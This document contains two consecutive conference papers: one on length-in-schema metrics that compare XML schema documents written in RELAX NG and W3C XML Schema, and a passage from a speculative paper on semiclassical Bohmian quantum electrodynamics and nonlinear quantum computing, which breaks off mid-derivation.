Abstract. Length in Schema (LIS) is a numerical measurement of the schema documents (DS) of the extensible markup language (XML) that contain schemas from an XML schema language in manuscript form. LIS is likened to source lines of code (SLOC) in software complexity, which is used to calculate the amount of effort that will be required to develop a schema document. Different LIS measures were considered, namely Blank Length in Schema (BLIS), Total Length in Schema (TLIS), Commented Length in Schema (CLIS) and Effective Length in Schema (ELIS), for sixty (60) different schema documents acquired online through the Web Services Description Language (WSDL) and implemented in two schema languages, Relax-NG (rng) and W3C XML Schema (wxs), to estimate schema productivity and maintainability. It was discovered that schemas are, overall, easier to understand and more flexible, with less maintenance effort, in rng than in wxs.
Keywords: Relax-NG (rng) · W3C XML schema (wxs) · Schema documents (DS)
1 Introduction
The increased complexity of modern software applications also increases the difficulty of making the code reliable and maintainable. Code metrics are a set of software measures that give developers better insight into the code they are developing. By taking advantage of code metrics, developers can understand which types and/or methods should be reworked or more thoroughly tested. Code complexity should be measured as early as possible in coding [1, 4] to locate complex code, in order to obtain high-quality software with a low cost of testing and maintenance. It is also used to compare, evaluate and rank competing programming applications [2–4]. Code-based complexity measures comprise the lines of code/source lines of code metric, the Halstead complexity measure and the McCabe cyclomatic complexity measure, but this paper considers only the lines of code metric in relation to XML schema documents. XML is a dedicated data-description language used to store data [5]. It is often used in web development to save data into XML files. XSLT APIs are used to generate content in the required format, such as HTML, XHTML and XML, which allows developers to transfer data and to save configuration or business data for applications [6].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 349–361, 2023. https://doi.org/10.1007/978-3-031-28073-3_25
K. Sotonwa et al.
XML is a markup language created by the World Wide Web Consortium (W3C) to define a syntax for encoding documents that both humans and machines can read. It does this through the use of tags that define the structure of the document, as well as how the document should be stored and transported. Data representation and transportation formats accepted in diverse fields are produced by designing a schema, which can be written in any of a series of XML schema languages. A schema is a formal definition of the syntax of an XML-based language that defines a family of XML documents. An XML schema is a description of a type of XML document, typically expressed in terms of constraints on the structure and content of documents of that type, above and beyond the basic syntactical constraints imposed by XML itself [4, 7, 8]. These constraints are generally expressed using some combination of grammatical rules governing the order of elements. A schema language is a formal language for expressing schemas [9]. There are a number of schema languages available: dtd [10], wxs [11, 12], rng [13, 14], schematron [15–17], etc. Length in schema, similar to lines of code, is generally taken to be the count of lines in the schema of XML documents, which also takes the validated documents into account [4, 18]. LIS counts the lines of schema files implemented in rng and wxs, and it is independent of what the schema documents are used for. LIS evaluates the complexity of the software via its physical length. The XML documents in this paper were acquired online and implemented in rng and wxs.
2 Review of Related Works
Harrison et al. [19] examined the lines of code (LOC) metric: code written in one programming language may be much more effective than code written in another, so two programs that provide the same functionality but are written in two different languages may have different LOC values; the metric therefore neglects all other factors that affect the complexity of software. Vu-Nguyen et al. [20] presented a set of counting standards that defines what and how to count SLOC. They suggested that this problem can be alleviated by the use of a reasonable and unambiguous counting standard guide with the support of a configurable counting tool. Kaushal-Bhatt et al. [21] evaluated some drawbacks of SLOC metrics that affect the quality of software, because SLOC metric output is used as an input to other software estimation methods such as the COCOMO model. Armit and Kamar [22] formulated a metric that counts the number of lines of code but neglects the intelligence content, layout and other factors that affect the complexity of the code. Sotonwa et al. [2, 3] proposed a metric that counts the number of lines of code, commented lines and non-commented lines for various object-oriented programming languages. Sotonwa et al. [4] also applied SLOC metrics to XML schema documents in order to estimate schema productivity and maintainability; those metrics were based on only one XML schema language (RNG). There is a need to take this work further by comparing different schema languages with SLOC metrics, as was done with different object-oriented programming languages, to show the flexibility and understandability of schemas with respect to reduced maintenance effort.
3 Materials and Methods
3.1 Experimental Setup of LIS Metric
The LIS metric investigates a code-based complexity metric, analogous to source lines of code (SLOC), using schema documents implemented in the XML schema languages rng and wxs, in order to measure the length of the schemas and to find the complexity variations between the implementation languages. The following approaches were applied:
• Length in schema was implemented in the rng and wxs XML schema languages.
• Different types of LIS were evaluated for different implementations of schema documents in rng and wxs.
• The results from the two (2) schema languages, rng and wxs, were compared.
• An analysis of variance of the schema languages was developed and confirmed as an explanation for the observed data.
The metric is applied to sixty (60) different schema files acquired online through web services description languages and implemented in rng and wxs; the rng and wxs codes differ from each other in their architecture [23–40]. Different types of LIS were considered for each schema document, as follows:
• Total length in schema (TLIS): counts the number of lines in the source code of the schema. It counts every line, including commented and blank lines.
• Blank length in schema (BLIS): counts only the blank lines in the source code. These lines only make the code look spacious and easy to comprehend; the code executes with or without them.
• Commented length in schema (CLIS): counts lines that contain comments only.
• Effective length in schema (ELIS): counts lines that are not commented, blank, or standalone braces or parentheses. This metric presents the actual work performed within the code; it counts all executable lines.
The equations are defined as:
$$\mathrm{ELIS}_{\text{SD.rng}} = \mathrm{TLIS}_{\text{SD.rng}} - (\mathrm{BLIS}_{\text{SD.rng}} + \mathrm{CLIS}_{\text{SD.rng}}) \tag{1}$$
$$\mathrm{ELIS}_{\text{SD.wxs}} = \mathrm{TLIS}_{\text{SD.wxs}} - (\mathrm{BLIS}_{\text{SD.wxs}} + \mathrm{CLIS}_{\text{SD.wxs}}) \tag{2}$$
where ELIS is the effective length in schema, SD is the schema document in rng or wxs, TLIS is the total length in schema, BLIS is the blank length in schema, and CLIS is the commented length in schema.
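The four counts defined above can be computed mechanically from the text of a schema file. The following is a minimal sketch, assuming schemas in XML syntax whose comments are written as `<!-- ... -->`; the function name `lis_metrics` and the sample schema are hypothetical. As simplifications, a line is treated as commented only if it starts a comment and has no markup after it or lies inside a multi-line comment, and standalone braces or parentheses are not treated specially, in line with Eqs. (1) and (2).

```python
def lis_metrics(schema_text):
    """Return TLIS, BLIS, CLIS and ELIS = TLIS - (BLIS + CLIS) for a schema."""
    tlis = blis = clis = 0
    in_comment = False  # True while inside a multi-line <!-- ... --> comment
    for line in schema_text.splitlines():
        tlis += 1
        stripped = line.strip()
        if in_comment:
            clis += 1  # every line of a multi-line comment counts as commented
            in_comment = "-->" not in stripped
            continue
        if not stripped:
            blis += 1
        elif stripped.startswith("<!--") and (
            stripped.endswith("-->") or "-->" not in stripped
        ):
            clis += 1  # comment-only line, closed here or continued below
        # A comment opened on this line and not yet closed continues on the next.
        in_comment = stripped.rfind("<!--") > stripped.rfind("-->")
    return {"TLIS": tlis, "BLIS": blis, "CLIS": clis, "ELIS": tlis - (blis + clis)}


# Hypothetical RELAX NG (XML syntax) fragment used only for illustration.
SAMPLE_SCHEMA = "\n".join([
    "<!-- note schema -->",
    '<element name="note" xmlns="http://relaxng.org/ns/structure/1.0">',
    "",
    "  <!-- body",
    "       of the note -->",
    '  <element name="body"><text/></element>',
    "</element>",
])

if __name__ == "__main__":
    print(lis_metrics(SAMPLE_SCHEMA))
```

For the seven-line sample, one line is blank and three are commented, which leaves three effective lines.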
Demonstration samples of the proposed metric for rentalProperties, contact-info and note, implemented in rng, are given in Fig. 1, Fig. 2 and Fig. 3, and their analyses are given for the different variations of the LIS metric.
Fig. 1. Schema document for RentalProperties in rng.
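$\mathrm{TLIS}_{\text{rentalProperties.rng}} = 46$, $\mathrm{BLIS}_{\text{rentalProperties.rng}} = 0$, $\mathrm{CLIS}_{\text{rentalProperties.rng}} = 2$
$\mathrm{ELIS}_{\text{rentalProperties.rng}} = \mathrm{TLIS}_{\text{rentalProperties.rng}} - (\mathrm{BLIS}_{\text{rentalProperties.rng}} + \mathrm{CLIS}_{\text{rentalProperties.rng}}) = 46 - (0 + 2) = 44$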
Fig. 2. Schema document for contact-info in rng
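$\mathrm{TLIS}_{\text{contact-info.rng}} = 19$, $\mathrm{BLIS}_{\text{contact-info.rng}} = 1$, $\mathrm{CLIS}_{\text{contact-info.rng}} = 5$
$\mathrm{ELIS}_{\text{contact-info.rng}} = \mathrm{TLIS}_{\text{contact-info.rng}} - (\mathrm{BLIS}_{\text{contact-info.rng}} + \mathrm{CLIS}_{\text{contact-info.rng}}) = 19 - (1 + 5) = 13$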
Fig. 3. Schema document for note in rng
$\mathrm{TLIS}_{\text{note.rng}} = 23$, $\mathrm{BLIS}_{\text{note.rng}} = 3$, $\mathrm{CLIS}_{\text{note.rng}} = 3$
$\mathrm{ELIS}_{\text{note.rng}} = \mathrm{TLIS}_{\text{note.rng}} - (\mathrm{BLIS}_{\text{note.rng}} + \mathrm{CLIS}_{\text{note.rng}}) = 23 - (3 + 3) = 17$

Sample schema documents for rentalProperties, contact-info and note implemented in wxs are given in Fig. 4, Fig. 5 and Fig. 6, together with the analysis of each variation of the LIS metric.
Fig. 4. Schema document for RentalProperties in wxs
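$\mathrm{TLIS}_{\text{rentalProperties.wxs}} = 46$, $\mathrm{BLIS}_{\text{rentalProperties.wxs}} = 1$, $\mathrm{CLIS}_{\text{rentalProperties.wxs}} = 23$
$\mathrm{ELIS}_{\text{rentalProperties.wxs}} = \mathrm{TLIS}_{\text{rentalProperties.wxs}} - (\mathrm{BLIS}_{\text{rentalProperties.wxs}} + \mathrm{CLIS}_{\text{rentalProperties.wxs}}) = 46 - (1 + 23) = 22$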
Fig. 5. Schema document for contact-info in wxs
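$\mathrm{TLIS}_{\text{contact-info.wxs}} = 14$, $\mathrm{BLIS}_{\text{contact-info.wxs}} = 1$, $\mathrm{CLIS}_{\text{contact-info.wxs}} = 4$
$\mathrm{ELIS}_{\text{contact-info.wxs}} = \mathrm{TLIS}_{\text{contact-info.wxs}} - (\mathrm{BLIS}_{\text{contact-info.wxs}} + \mathrm{CLIS}_{\text{contact-info.wxs}}) = 14 - (1 + 4) = 9$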
Fig. 6. Schema document for note in wxs
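$\mathrm{TLIS}_{\text{note.wxs}} = 14$, $\mathrm{BLIS}_{\text{note.wxs}} = 0$, $\mathrm{CLIS}_{\text{note.wxs}} = 1$
$\mathrm{ELIS}_{\text{note.wxs}} = \mathrm{TLIS}_{\text{note.wxs}} - (\mathrm{BLIS}_{\text{note.wxs}} + \mathrm{CLIS}_{\text{note.wxs}}) = 14 - (0 + 1) = 13$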
Table 1. Complexity measures for comparing rng and wxs schema documents

S/no  Schemas              TLISrng  ELISrng  BLISrng  CLISrng  TLISwxs  ELISwxs  BLISwxs  CLISwxs
1     RentalProperties     46       44       0        2        46       22       1        23
2     LinearLayout         68       58       4        6        52       27       1        24
3     Weather-observation  97       92       1        4        75       43       1        31
4     Cookingbook          37       32       1        4        32       24       2        6
5     myShoeSize           12       8        1        3        13       11       0        2
6     Documents            38       37       0        1        50       39       0        11
7     Supplier             26       24       1        1        24       15       2        7
8     Customer             19       17       1        1        23       14       1        8
9     Contact              17       15       1        1        16       8        1        7
10    Books                42       32       3        7        43       26       2        15
11    Saludar              40       30       8        2        37       28       1        8
12    Portfolio            24       21       1        2        21       11       1        9
13    Breakfast_menu       26       24       1        1        25       14       1        10
14    Investments          25       16       1        8        20       12       1        7
15    Library              110      97       4        9        53       34       3        16
16    Contact-info         19       13       1        5        14       9        1        4
17    Students             17       16       0        1        22       14       2        6
18    Configuration-file   24       20       0        4        24       18       0        6
19    Shiporder            49       43       3        3        32       21       0        11
20    Bookstore            30       26       1        3        30       17       1        12
21    Dataroot             29       25       2        2        66       52       2        12
22    Dictionary           29       25       1        3        34       21       1        12
23    Catalog              33       31       0        2        30       16       0        14
24    Soap                 34       27       0        7        36       24       1        11
25    PurchaseOrder        68       62       0        6        60       30       1        29
26    Letter               67       60       0        7        62       40       0        22
27    Clients              31       27       1        3        33       20       2        11
28    ZCSImport            32       30       1        1        36       20       1        15
29    Guestbook            17       16       0        1        20       14       0        6
30    Note                 24       18       3        3        14       13       0        1
4 Result and Discussion

This section presents the results of the series of experiments conducted to show the efficiency of the proposed metric. Applying LIS to the schema documents indicates the effort required to understand their information content when implemented in rng and wxs; the values for all schema documents are given in Table 1. Column 1 of Table 1 gives the serial numbers of the schema documents, column 2 lists the thirty (30) schema documents, and columns 3 to 6 and columns 7 to 10 give the complexity values calculated for each LIS (TLIS, ELIS, BLIS and CLIS) in rng and wxs respectively.
The relative graph in Fig. 7 shows all complexity values in rng and wxs for BLIS and CLIS. For the sample schema documents given above (rentalProperties, contact-info and note), the BLIS values are 0, 1 and 3 in rng and 1, 1 and 0 in wxs respectively, so they are close in both languages. This is because BLIS counts only blank lines, and schemas validate with or without these lines, even though wxs does have empty elements and whitespace. An empty element in wxs does not mean that the line of the schema is blank; it only means that the element has no content. Whitespace is of two types, significant and insignificant. Significant whitespace occurs within elements that contain text and markup together, while insignificant whitespace occurs where only element content is allowed. The CLIS values in rng (2, 5 and 3 for rentalProperties, contact-info and note) are also close to one another, but those in wxs (23, 4 and 1) are not, because wxs is quite verbose and has weak structural support for unordered content. This produced more CLIS in wxs than in rng, making wxs more complex and more difficult to understand than rng, which is easier, lightweight and has richer structure options. Figure 8 compares TLIS and ELIS in rng and wxs; all the schema documents presented have larger values for TLIS than for ELIS in both rng and wxs.
For example, the TLIS:ELIS ratios for rentalProperties, contact-info and note are 46:44, 19:13 and 24:18 in rng and 46:22, 14:9 and 14:13 in wxs respectively. TLIS is larger in both rng and wxs because it is the overall total of all lines of the schema, including blank, commented and effective lines, whereas ELIS counts only the logical schema, i.e. the actual lines that make the schema validate; commented and blank lines are not considered. Finally, a general comparison of all complexity values between rng and wxs revealed that rng had larger values for more than two thirds of the schema documents presented, owing to the greater diversity of elements in rng (i.e. elements may appear in any order). This gives rng more regularity and reusability, through the frequent occurrence of similarly structured elements, and encourages leveraging existing schema documents instead of building new schemas from scratch.
Fig. 7. Relative graph for schema documents of LIS in rng and wxs
Fig. 8. Comparison of TLIS and ELIS in rng and wxs
5 Conclusion

Length in lines of code or schema is widely used and universally accepted because it permits comparison of size and productivity metrics between diverse development groups. It relates directly to the end product and is easily measured upon project completion. It measures software from the developer's point of view, that is, what a line of code (and likewise a line of schema) actually does, and in turn supports the continuous improvement of estimation techniques. Comparing the different LIS in rng and wxs showed that rng gives a better presentation of schema documents, with a high degree of flexibility, reusability and comprehensibility, which helps the developer become familiar with the structure of the schema language, because rng has stronger support than wxs for class elements appearing in any order. wxs is also good, but it has weak support for unordered content.
References

1. Elliot, T.A.: Assessing fundamental introductory computing concept knowledge in a language independent manner. Ph.D. Dissertation, Georgia Institute of Technology, USA (2010)
2. Sotonwa, K.A., Olabiyisi, S.O., Omidiora, E.O.: Comparative analysis of software complexity of searching algorithms using code base metric. Int. J. Sci. Eng. Res. 4(6), 2983–2992 (2014)
3. Sotonwa, K.A., Balogun, M.O., Isola, E.O., Olabiyisi, S.O., Omidiora, E.O., Oyeleye, C.A.: Object oriented programming languages for searching algorithms in software complexity metrics. Int. Res. J. Comput. Sci. 4(6), 2393–9842 (2019)
4. Sotonwa, K.A., Olabiyisi, S.O., Omidiora, E.O., Oyeleye, C.A.: SLOC metric in RNG schema documents. Int. J. Latest Technol. Eng. Manag. Appl. Sci. 8(2), 1–5 (2019)
5. Gavin, B.: What is an XML file, and how do I open one (2018)
6. RoseIndia.Net: Why XML is used for? (2018)
7. Makoto, M., Dongwon, L., Murali, M.: Taxonomy of XML schema languages using formal language theory. Extreme markup language: XML source via XSL, Saxon and Apache FOP, Mulberry Technologies, Inc., pp. 153–166 (2001)
8. Sotonwa, K.A.: Comparative analysis of XML schema languages for improved entropy metric. FUOYE J. Eng. Technol. 5(1), 36–41 (2020)
9. Satish, B.: Introduction to XML part 1: XML Tutorial
10. Bray, T., Jean, P., Sperberg-McQueen, M.C. (eds.): Extensible markup language (XML) 1.0. W3C recommendation (2012). http://www.w3.org/TR/1998/REC-xml-19980210.html
11. Binstock, C., Peterson, D., Smith, M., Wooding, M., Dix, C., Galtenberg, C.: The XML Schema Complete Reference. Addison Wesley Professional Publishing Co. Inc., Boston (2002). ISBN: 0672323745
12. Thompson, H.S., Beech, D., Muzmo, M., Mendelsohn, N. (eds.): XML schema part 1: Structures. W3C recommendation (2004). http://www.w3.org/TR/xmlschema-1/
13. Makoto, M.: RELAX (regular language description for XML). ISO/IEC DTR 22250-1, Document Description and Processing Languages -- Regular Language Description for XML (RELAX) -- Part 1: RELAX Core (Family Given) (2000)
14. ISO: ISO/IEC TR 22250-1:2002 - Information Technology -- Document description and processing languages -- Regular Language Description for XML (RELAX) -- Part 1: RELAX Core, First Edition, Technical Committee 36 (2002)
15. Makoto, M., Dongwon, L., Murali, M., Kohsuke, K.: Taxonomy of XML schema languages using formal language theory. ACM Trans. Internet Technol. 5(4), 660–704 (2005)
16. Gill, G.K., Kemerer, C.F.: Cyclomatic complexity density and software maintenance. IEEE Trans. Softw. Eng. 17, 1284–1288 (1991)
17. Sotonwa, K.A., Olabiyisi, S.O., Omidiora, E.O., Oyeleye, C.A.: Development of improved schema entropy and interface complexity metrics. Int. J. Res. Appl. Sci. Eng. Technol. 7(I), 611–621 (2019)
18. Balogun, M.O., Sotonwa, K.A.: A comparative analysis of complexity of C++ and Python programming languages using multi-paradigm complexity metric (MCM). Int. J. Sci. Res. 8(1), 1832–1837 (2019)
19. Harrison, W.K., Magel, R., Kluczny, Dekock, A.: Applying Software Complexity Metrics to Program Maintenance. IEEE Journal Computer Archive Society Press, Los Alamitos (1982)
20. Vu, N., Deeds-Rubin, S., Thomas, T., Boehm, B.: A SLOC counting standard. Center for Systems and Software Engineering, University of Southern California (2007)
21. Bhatt, K., Vinit, T., Patel, P.: Analysis of source lines of code (SLOC) metric. Int. J. Emerg. Technol. Adv. Eng. 2(2), 150–154 (2014)
22. Amit, K.J., Kumar, R.: A new cognitive approach to measure the complexity of software. Int. J. Softw. Eng. Appl. 8(7), 185–198 (2014)
23. http://docbook.sourceforge.net/release/dsssl/current/dtds/
24. http://java.sun.com/dtd/
25. http://www.ncbi.nlm.nih.gov/dtd/
26. http://www.cs.helsinki.fi/group/doremi/publications/XMLSCA2000.Html
27. http://www.w3.org/TR/REC-xml-names/
28. http://www.omegahat.org/XML/DTDs/
29. http://www.openmobilealliance.org/Technical/dtd.aspx
30. http://fisheye5.cenqua.com/browse/glassfish/update-center/dtds/
31. http://www.python.org/topics/xml/dtds/
32. http://www.okiproject.org/polyphony/docs/raw/dtds/
33. http://www.w3.org/XML/. Accessed 2008
34. http://ivs.cs.uni-magdeburg.de/sw-eng/us/metclas/index.shtml. Accessed 2008
35. http://www.xml.gr.jp/relax. Accessed 2008
36. http://www.w3.org/TR/2004/REC-xmlschema-1-20041028/. Accessed 2008
37. http://www.w3.org/TR/2001/PR-xmlschema-0-20010330/. Accessed 2008
38. http://www.w3.org/TR/1998/REC-xml-19980210. Accessed 2008
39. http://www.xfront.com/GlobalVersusLocal.html. Accessed 2008
40. http://www.oreillynet.com/xml/blog/2006/05/metrics_for_xml_projects_1_ele.html. Accessed 2008
Bohmian Quantum Field Theory and Quantum Computing

F. W. Roush
Alabama State University, Montgomery, AL 36101-0271, USA

Abstract. Abrams and Lloyd proved that if quantum mechanics has a small nonlinear component then theoretical quantum computers would be able to solve NP-complete problems. We show that a semiclassical theory of electrodynamics in which the fermions are quantized but the electromagnetic field is not, and in which the particles and the field interact in a natural way, does have such a nonlinear component. We argue that in many situations this semiclassical theory will be a close approximation to quantum field theory. In a more speculative argument, we discuss the possibility that the apparent quantization of the electromagnetic field could be a result of (1) quantization of interactions of the electromagnetic field with matter and (2) wave packets, regions within the electromagnetic field that are approximate photons. At the least this gives a theory which, if crude, avoids the major divergences of standard quantum field theory. We suggest how this might be extended to a quantum theory of the other three forces by modifying the Standard Model and using a model of gravity equivalent to spin 2 gravitons. This also provides a quantum field theory that agrees with Bohmian ideas.

Keywords: Quantum computing · NP-complete · Semiclassical field theory · Bohmian mechanics · Unified field theory
1 Introduction
Standard quantum mechanics is a theory that can predict motions of particles that are also waves. It does this by solving the wave equation, the Schrödinger equation, which is a standard linear partial differential equation like the heat equation except for a factor $i = \sqrt{-1}$, to get solutions which are wave functions $\psi$. Then $|\psi|^2$ gives the probability density function for positions of particles such as a system of electrons. There are also alternative formulations of quantum mechanics due to Heisenberg, Dirac, and Feynman, which use matrices or path integrals to derive versions of $\psi$. The motion of electrons around nuclei is quantized in terms of operators occurring in the Schrödinger equation which represent energy. Angular momentum is also quantized. The allowed energy levels are the eigenvalues of these operators, and radiation occurs when a particle jumps from one state to another, with energy equal to the difference of the energy levels of the two states.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 362–371, 2023. https://doi.org/10.1007/978-3-031-28073-3_26
As will be mentioned later, Planck's law $E = h\nu$ relating energy $E$, frequency $\nu$, and Planck's constant $h$, as well as the law $p = \frac{h}{2\pi}k$ relating momentum $p$ and wave number $k$, are satisfied. Essentially all of chemistry is an application of quantum mechanics. Quantum mechanics deals with a system of a given number of particles of matter, called fermions, such as protons and electrons, and their interactions. Quantum field theory is a refinement of quantum mechanics which includes fields as well as matter particles. The fields are considered as quantized into particles called bosons, such as photons. There are many notorious mathematical difficulties with quantum field theory, such as divergent series, infinite masses, and operators that do not lie in Hilbert spaces, but where calculations have been possible, it agrees with experiment to high accuracy.

Here we focus on a theory which is intermediate between the two, and can be called semiclassical. The interaction of matter particles and fields is considered; only the matter particles are fundamentally quantized, though the fields inherit some quantum properties from the fermions. Almost none of the ideas presented here is new, but possibly the combination of ideas is new. A motivation for this method is the desire to see whether a more powerful quantum computer could be built using effects from general quantum field theory and not just quantum mechanics and a separate theory of photons. This is difficult using the standard perturbative methods because so many computations diverge (in fact even the perturbative series of quantum electrodynamics diverge in all nontrivial cases). There is no good theory of the quantum vacuum, and this is important because the zero-point energy of the vacuum, which seems theoretically to be infinite, can affect real experiments.
Even if the model presented next is a gross oversimplification, it might still allow computations to be made which are approximately correct.

The primary goal of this paper is to bring a quantum computer that could solve NP-complete problems a little closer, by proposing a nonlinear quantum dynamics that is consistent with the theorem of Abrams and Lloyd that such computers would exist provided that quantum mechanics has a small nonlinear component. The particular mechanics involved is a model of quantum electrodynamics that is first quantized but not second quantized. In many situations this will closely approximate the results from a second quantized model, and it is in some respects a lot easier to work with. A second goal is to discuss the question whether this model might actually be a correct theory of quantum electrodynamics. This requires a discussion of what photons are. This and the final part are speculative. A final goal is to indicate how this might be extended to other forces for a unified field theory. This theory fits well with Bohmian ideas, but does not require them.
2 The Abrams-Lloyd Theorem
It was proved by Abrams and Lloyd [1] that if quantum mechanics has a small nonlinear component, then quantum computers could solve NP-complete problems in polynomial time. Abrams and Lloyd give two constructions, of which the first is more general and the second more fault-tolerant. By the Valiant-Vazirani theorem [8] it is enough to work with the case in which an NP problem has at most 1 solution. We might take a problem of the form $f(v) = 1$ where $f$ is a Boolean function of $n$ binary inputs. By the construction for Forrelation, a standard quantum computer can obtain a unit vector of size $N = 2^n$, where there are $n$ qubits for this vector, such that the entries of the vector are $\pm\frac{1}{2^{n/2}}$ and the sign of the entry whose index in binary notation is $v$ is $(-1)^{f(v)}$. This can then be transformed to a fairly arbitrary unit vector by quantum operations.

Then Abrams and Lloyd use the result that almost any nonlinear dynamical system given by a transformation $f$ on a state space $V$ will have exponential sensitivity to initial conditions, that is, a positive Lyapunov exponent, so that the iterates $f^n$ will magnify distances exponentially as $n$ increases. The distance between the vector for 1 solution and the vector for no solutions is exponentially small, but these iterates will magnify the difference until a quantum computer can measure it.

The second algorithm of Abrams and Lloyd involves applying a gate to pairs of coordinates, so that if both are positive the results are stable, but if one is negative then the results become measurably smaller. We first use pairs whose indices differ by 2, then by 4, and so on, equivalently working with different qubits. This will produce a relatively significant difference in a significant fraction of all entries, and again, this can be measured. If there is good relative accuracy for the individual operations, then the result will be accurate.
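Two quantitative points in this argument can be checked numerically. The sketch below is only an illustration under stated assumptions: `phase_vector`, `distance` and `logistic_separation` are hypothetical helper names, and the logistic map $x \mapsto 4x(1-x)$ is used as a classical stand-in for a nonlinear map with a positive Lyapunov exponent; it is not the gate used by Abrams and Lloyd.

```python
import math


def phase_vector(f, n):
    """Unit vector with entries (-1)**f(v) / 2**(n/2), v = 0 .. 2**n - 1."""
    amp = 1.0 / math.sqrt(2 ** n)
    return [amp * (-1) ** f(v) for v in range(2 ** n)]


def distance(u, w):
    """Euclidean distance between two real vectors of equal length."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(u, w)))


def logistic_separation(x0, delta, steps):
    """Separation of two orbits of x -> 4x(1-x) started delta apart.

    Assumption: this classical chaotic map only illustrates exponential
    sensitivity to initial conditions.
    """
    x, y = x0, x0 + delta
    seps = []
    for _ in range(steps):
        seps.append(abs(x - y))
        x = 4.0 * x * (1.0 - x)
        y = 4.0 * y * (1.0 - y)
    return seps


n = 10
no_solution = phase_vector(lambda v: 0, n)
one_solution = phase_vector(lambda v: 1 if v == 5 else 0, n)

# The two vectors differ in a single entry, so their distance is 2 / 2**(n/2).
print(distance(no_solution, one_solution), 2 / 2 ** (n / 2))

# A tiny initial gap grows to order one after a few dozen iterations.
seps = logistic_separation(0.3, 1e-12, 80)
print(seps[0], max(seps))
```

The distance $2/2^{n/2}$ shrinks exponentially in the number of qubits, which is why some amplifying (nonlinear) step is needed before a measurement can tell the two cases apart.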
3 Lagrangians and Yang-Mills Fields
In classical fields, the Lagrangian is the difference $L = T - V$ of kinetic and potential energy. The least action principle, which is equivalent to Newton's laws for conservative forces, says that the action $S$, the time integral of the Lagrangian, is the minimum or at least a critical point, for the actual trajectory of an object, as compared with other possible paths. This will also be true in the theory here. The Euler formula for maximizing or minimizing a definite integral $\int_a^b F(t, f, f')\,dt$ over functions $f(t)$ with given values at the endpoints, where $f'(t) = \frac{df}{dt}$, is
$$0 = \frac{\partial}{\partial f}F - \frac{d}{dt}\frac{\partial}{\partial f'}F.$$
The Euler formula can be extended to more variables and higher derivatives in a natural way, and constraints can be incorporated with Lagrange multipliers. For example, in a flat space with no forces, $V = 0$, $T = \frac{mv^2}{2}$, and the least action principle says particles will move in a straight line with constant velocity.
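As a short worked check of the free-particle statement, the Euler formula can be applied with $f = x(t)$ and $F = L$. The one-dimensional setting and the symbols $x_0$, $v_0$ are assumptions made only for this illustration.

```latex
% Free particle: L = T - V with V = 0 and T = m x'^2 / 2.
\begin{align*}
L(t, x, x') &= \tfrac{1}{2} m\,x'^2, \\
\frac{\partial L}{\partial x} &= 0, \qquad
\frac{\partial L}{\partial x'} = m\,x', \\
0 &= \frac{\partial L}{\partial x} - \frac{d}{dt}\frac{\partial L}{\partial x'}
   = -m\,x'' \;\Longrightarrow\; x(t) = x_0 + v_0 t .
\end{align*}
% With a potential, L = m x'^2 / 2 - V(x), the same formula gives
% m x'' = -V'(x), which is Newton's second law for a conservative force.
```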
The theories of general fields, such as the color field which affects quarks, are often stated in terms of Lagrangians, but using other principles. Schwinger and Tomonaga used a modified variational principle. This is
$$\delta\langle B|A\rangle = i\langle B|\delta S|A\rangle$$
where $|A\rangle$ and $|B\rangle$ are early and late states of a quantum system, $S$ is the action and $\delta$ is the functional derivative (as in Euler's equation above). Feynman used the principle that the integral over all paths of the exponentiated action $e^{2\pi i S/h}$, where $S$ is the time integral of the Lagrangian $L$, determines the transition matrix between the wave function at one point of space-time and the wave function at another. Path integrals involve some mathematical difficulties but can be approximated by breaking paths into polygonal segments and using a Gaussian probability distribution. This principle applies to fields as well as particles. In the process we need to sum over all possibilities for interactions of particles, such as absorption or emission of photons by electrons.

Yang-Mills theory associates a Lagrangian formula with a continuous group $G$. It is the way in which the force laws for the strong and weak forces are most conveniently derived and related to electromagnetism in the Standard Model of forces other than gravity. The equations can be specified in terms of the Lie algebra of $G$, which specifies the infinitesimal multiplication, or, more theoretically, in terms of the curvature of a connection. The electromagnetic, weak, and strong forces correspond respectively to the groups $U(1)$, $SU(2)$, $SU(3)$ of complex matrices of sizes $1\times 1$, $2\times 2$, $3\times 3$ which preserve the lengths of vectors in terms of complex absolute values, and in the latter two cases have determinant 1. Interactions between forces can be specified in a similar way.
A Nonlinear Semiclassical Quantum Electrodynamics

We first note that, typically, nonlinear physical dynamical systems can be viewed as unitary systems on some huge space, since usually some measure will be preserved. Then there is a space $L^2$ of all measurable, square-integrable functions on this space, and the dynamics on this function space is linear and unitary. This is a little like passing to a second quantization. But if the original nonlinear theory is large enough to do quantum mechanics with it, that is, there are Schrödinger or Dirac equations and particle wave functions tensor as we include more particles, then that system is large enough for nonlinear quantum computers.

In the simplest sense, any model for electrodynamics that includes both fields and particles and some kind of interaction between the two will include some version of the equation for the force on a charged particle in a magnetic field,
$$F = qv \times B$$
where $F$ is force, $q$ is charge, $v$ is the velocity of the particle, and $B$ is magnetic field.
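The opening remark of this subsection, that a nonlinear measure-preserving system induces linear, norm-preserving dynamics on a space of functions, can be illustrated on a toy finite state space. Everything in the sketch is an assumption chosen for illustration: the state space is the integers modulo 11 with counting measure, the nonlinear map is $T(x) = x^3 \bmod 11$, and `koopman` is a hypothetical name for the induced composition operator.

```python
P = 11  # toy state space {0, ..., 10} with counting measure


def T(x):
    """A nonlinear map on the state space; it permutes the 11 states."""
    return pow(x, 3, P)


def koopman(f):
    """Induced operator on functions: (U f)(x) = f(T(x))."""
    return [f[T(x)] for x in range(P)]


def norm_sq(f):
    """Squared L2 norm with respect to counting measure."""
    return sum(a * a for a in f)


f = [x * x - 3 for x in range(P)]      # two arbitrary integer-valued functions
g = [(-1) ** x * x for x in range(P)]
a, b = 2, -5

# T is not additive, so it is not a linear map on the states ...
print(T(1) + T(1), T(2))

# ... but the induced operator on functions is linear and preserves the norm.
lhs = koopman([a * fx + b * gx for fx, gx in zip(f, g)])
rhs = [a * uf + b * ug for uf, ug in zip(koopman(f), koopman(g))]
print(lhs == rhs, norm_sq(koopman(f)) == norm_sq(f))
```

Norm preservation here relies on $T$ being a bijection, which is the finite analogue of preserving a measure.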
This equation is nonlinear when the particle motion affects the magnetic field. However, we consider a more exact system in the case of one particle, which can be viewed as the standard system of electrodynamics after first quantization but before second quantization [9]:
